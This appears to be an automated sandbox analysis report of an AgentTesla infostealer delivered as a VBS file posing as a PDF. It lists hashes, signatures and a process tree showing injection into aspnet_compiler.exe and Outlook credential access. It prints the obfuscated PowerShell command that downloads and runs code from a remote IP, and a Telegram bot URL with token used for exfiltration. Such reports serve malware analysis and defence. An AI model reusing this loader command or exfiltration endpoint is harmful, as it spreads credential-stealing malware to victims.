Analysis
-
max time kernel
136s -
max time network
125s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
21-10-2021 18:19
Static task
static1
Behavioral task
behavioral1
Sample
183287857-050118-sanlccjavap0004-6561_PDF.vbs
Resource
win7-en-20210920
Behavioral task
behavioral2
Sample
183287857-050118-sanlccjavap0004-6561_PDF.vbs
Resource
win10-en-20211014
General
-
Target
183287857-050118-sanlccjavap0004-6561_PDF.vbs
-
Size
440B
-
MD5
fd5d9dd54f30ebeda49b3f3d9d57d1c6
-
SHA1
bdc86ae73f8ea542af15ed6a5643b1a9cfd8ea51
-
SHA256
75e81b26f76f0050408e59a9d3606e0ee6d474ffa9e2296187f582884fa2f59f
-
SHA512
60857407aa6143be42149dac675348dcbfaa1a9ed8dd66e66fe936dbabca8dd490d3019573fe940631741047e7edb0b0df9730a33ccaf48aed077e939608b7b9
Malware Config
Extracted
http://202.55.132.106/Bypass3.txt
Extracted
agenttesla
https://api.telegram.org/bot1923270472:AAFHljVp-f8Q5-X0iy70Vfe0aTch5THPa-U/sendDocument
Signatures
-
AgentTesla
Agent Tesla is a remote access tool (RAT) written in visual basic.
-
AgentTesla Payload 3 IoCs
Processes:
resource yara_rule behavioral2/memory/3200-150-0x000000000043774E-mapping.dmp family_agenttesla behavioral2/memory/3200-153-0x0000000000730000-0x000000000076C000-memory.dmp family_agenttesla behavioral2/memory/3200-157-0x0000000004B60000-0x000000000505E000-memory.dmp family_agenttesla -
Blocklisted process makes network request 2 IoCs
Processes:
powershell.exeflow pid process 8 724 powershell.exe 21 724 powershell.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
Suspicious use of SetThreadContext 1 IoCs
Processes:
powershell.exedescription pid process target process PID 724 set thread context of 3200 724 powershell.exe aspnet_compiler.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Suspicious behavior: EnumeratesProcesses 5 IoCs
Processes:
powershell.exeaspnet_compiler.exepid process 724 powershell.exe 724 powershell.exe 724 powershell.exe 3200 aspnet_compiler.exe 3200 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
Processes:
powershell.exeaspnet_compiler.exedescription pid process Token: SeDebugPrivilege 724 powershell.exe Token: SeDebugPrivilege 3200 aspnet_compiler.exe -
Suspicious use of SetWindowsHookEx 1 IoCs
Processes:
aspnet_compiler.exepid process 3200 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 10 IoCs
Processes:
WScript.exepowershell.exedescription pid process target process PID 2500 wrote to memory of 724 2500 WScript.exe powershell.exe PID 2500 wrote to memory of 724 2500 WScript.exe powershell.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe PID 724 wrote to memory of 3200 724 powershell.exe aspnet_compiler.exe -
outlook_office_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
outlook_win_path 1 IoCs
Processes:
aspnet_compiler.exedescription ioc process Key opened \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe
Processes
-
C:\Windows\System32\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Temp\183287857-050118-sanlccjavap0004-6561_PDF.vbs"1⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" &('{1}{0}'-f'X','IE')(&('{1}{0}{2}' -f'je','New-Ob','ct') ('{1}{2}{0}' -f 'WebClient','Ne','t.')).('{2}{3}{1}{0}' -f'dString','nloa','D','ow').InVoKe('http://202.55.132.106/Bypass3.txt')2⤵
- Blocklisted process makes network request
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe"3⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
- outlook_office_path
- outlook_win_path
Network
MITRE ATT&CK Matrix ATT&CK v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
memory/724-129-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-151-0x0000029AF80A0000-0x0000029AF80A1000-memory.dmpFilesize
4KB
-
memory/724-117-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-118-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-119-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-120-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-122-0x0000029AF8670000-0x0000029AF8672000-memory.dmpFilesize
8KB
-
memory/724-121-0x0000029AF8000000-0x0000029AF8001000-memory.dmpFilesize
4KB
-
memory/724-123-0x0000029AF8673000-0x0000029AF8675000-memory.dmpFilesize
8KB
-
memory/724-124-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-125-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-126-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-127-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-128-0x0000029AFA750000-0x0000029AFA751000-memory.dmpFilesize
4KB
-
memory/724-152-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-133-0x0000029AF8676000-0x0000029AF8678000-memory.dmpFilesize
8KB
-
memory/724-144-0x0000029AF8070000-0x0000029AF8094000-memory.dmpFilesize
144KB
-
memory/724-116-0x0000029AF6690000-0x0000029AF6692000-memory.dmpFilesize
8KB
-
memory/724-115-0x0000000000000000-mapping.dmp
-
memory/3200-150-0x000000000043774E-mapping.dmp
-
memory/3200-153-0x0000000000730000-0x000000000076C000-memory.dmpFilesize
240KB
-
memory/3200-155-0x0000000005060000-0x0000000005061000-memory.dmpFilesize
4KB
-
memory/3200-156-0x0000000004D20000-0x0000000004D21000-memory.dmpFilesize
4KB
-
memory/3200-157-0x0000000004B60000-0x000000000505E000-memory.dmpFilesize
5.0MB
-
memory/3200-158-0x0000000005000000-0x0000000005001000-memory.dmpFilesize
4KB
-
memory/3200-159-0x00000000058C0000-0x00000000058C1000-memory.dmpFilesize
4KB
-
memory/3200-160-0x0000000005F90000-0x0000000005F91000-memory.dmpFilesize
4KB
-
memory/3200-161-0x0000000005A40000-0x0000000005A41000-memory.dmpFilesize
4KB